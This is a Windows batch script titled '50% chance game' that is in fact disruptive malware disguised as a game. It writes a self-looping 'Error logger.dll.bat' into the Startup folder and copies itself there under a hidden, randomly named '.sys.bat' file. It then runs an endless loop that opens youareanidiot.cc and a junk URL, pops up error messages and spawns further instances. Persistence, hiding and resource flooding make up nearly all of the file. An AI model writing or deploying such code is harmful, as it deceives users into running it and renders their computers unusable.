@echo off
title 50% chance game
echo Loading...
ping localhost >nul
echo @echo off >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping localhost /l 10000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping localhost /l 1000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping localhost /l 100 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping localhost /l 10 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.google.com /l 10000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.google.com /l 1000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.google.com /l 100 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.google.com /l 10 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping tvdsb.elearningontario.ca /l 10000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping tvdsb.elearningontario.ca /l 1000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping tvdsb.elearningontario.ca /l 100 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping tvdsb.elearningontario.ca /l 10 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.roblox.com /l 10000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.roblox.com /l 1000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.roblox.com /l 100 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.roblox.com /l 10 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.youtube.com /l 10000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.youtube.com /l 1000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.youtube.com /l 100 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.youtube.com /l 10 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.youtu.be /l 10000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.youtu.be /l 1000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.youtu.be /l 100 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.youtu.be /l 10 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.virustotal.com /l 10000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.virustotal.com /l 1000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.virustotal.com /l 100 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.virustotal.com /l 10 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.facebook.com /l 10000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.facebook.com /l 1000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.facebook.com /l 100 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.facebook.com /l 10 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.twitter.com /l 10000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.twitter.com /l 1000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.twitter.com /l 100 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.twitter.com /l 10 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.google.com /l 10000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.google.com /l 1000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.google.com /l 100 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.google.com /l 10 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.bing.com /l 10000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.bing.com /l 1000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.bing.com /l 100 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.bing.com /l 10 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.msm.com /l 10000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.msm.com /l 1000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.msm.com /l 100 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.msm.com /l 10 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.whatsapp.com /l 10000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.whatsapp.com /l 1000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.whatsapp.com /l 100 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.whatsapp.com /l 10 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping store.steampowered.com /l 10000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping store.steampowered.com /l 1000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping store.steampowered.com /l 100 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping store.steampowered.com /l 10 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.mozilla.org /l 10000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.mozilla.org /l 1000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.mozilla.org /l 100 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.mozilla.org /l 10 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.brave.com /l 10000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.brave.com /l 1000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.brave.com /l 100 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.brave.com /l 10 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.abcnews.go.com /l 10000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.abcnews.go.com /l 1000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.abcnews.go.com /l 100 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.abcnews.go.com /l 10 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping edition.cnn.com /l 10000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping edition.cnn.com /l 1000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping edition.cnn.com /l 100 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping edition.cnn.com /l 10 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.adguard.com /l 10000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.adguard.com /l 1000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.adguard.com /l 100 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.adguard.com /l 10 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping docs.google.com /l 10000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping docs.google.com /l 1000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping docs.google.com /l 100 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping docs.google.com /l 10 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping meet.google.com /l 10000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping meet.google.com /l 1000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping meet.google.com /l 100 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping meet.google.com /l 10 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.wikipedia.com /l 10000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.wikipedia.com /l 1000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.wikipedia.com /l 100 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.wikipedia.com /l 10 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.news.com /l 10000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.news.com /l 1000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.news.com /l 100 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.news.com /l 10 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.amazon.com /l 10000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.amazon.com /l 1000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.amazon.com /l 100 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.amazon.com /l 10 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.virus.gov /l 10000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.virus.gov /l 1000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.virus.gov /l 100 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.virus.gov /l 10 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.github.com /l 10000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.github.com /l 1000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.github.com /l 100 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.github.com /l 10 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping mail.google.com /l 10000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping mail.google.com /l 1000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping mail.google.com /l 100 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping mail.google.com /l 10 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.avast.com /l 10000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.avast.com /l 1000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.avast.com /l 100 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.avast.com /l 10 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.avg.com /l 10000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.avg.com /l 1000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.avg.com /l 100 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.avg.com /l 10 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.bitdefender.com /l 10000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.bitdefender.com /l 1000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.bitdefender.com /l 100 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.bitdefender.com /l 10 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.avira.com /l 10000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.avira.com /l 1000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.avira.com /l 100 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.avira.com /l 10 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.microsoft.com /l 10000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.microsoft.com /l 1000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.microsoft.com /l 100 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.microsoft.com /l 10 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.911.gov /l 10000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.911.gov /l 1000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.911.gov /l 100 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.911.gov /l 10 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.211.org /l 10000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.211.org /l 1000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.211.org /l 100 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping www.211.org /l 10 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
☺☻
echo :2 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
☺☻
echo ☺☻ >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
☺☻
echo echo Error! >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo start www.youareanidiot.cc >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo start start www.www.com.com >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping localhost /l 10000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping localhost /l 1000 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping localhost /l 100 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
echo ping localhost /l 10 /n 1 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
😡🤢
echo 😡🤢 >> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
😡🤢
echo goto :2>> "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
😡🤢
copy "The game of chance.exe.bat" "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" /y
☺☻
attrib +s +h "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\The game of chance.exe.bat"
☺☻
ren "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\The game of chance.exe.bat" SystemFileNum%random%.sys.bat
☺☻
:1
😡🤢
start youareanidiot.cc
msg * ERROR!
😡🤢
echo ERROR! >>"C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ErrorLogNum%random%.txt.txt"
😡🤢
start www.www.com.com
echo ERROR!
☺☻
start "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Error logger.dll.bat"
☺☻
echo ☺☻😡🤢 >>"The game of chance.exe.bat"
☺☻
start www.youareanidiot.cc
start www.www.com.com
goto :1
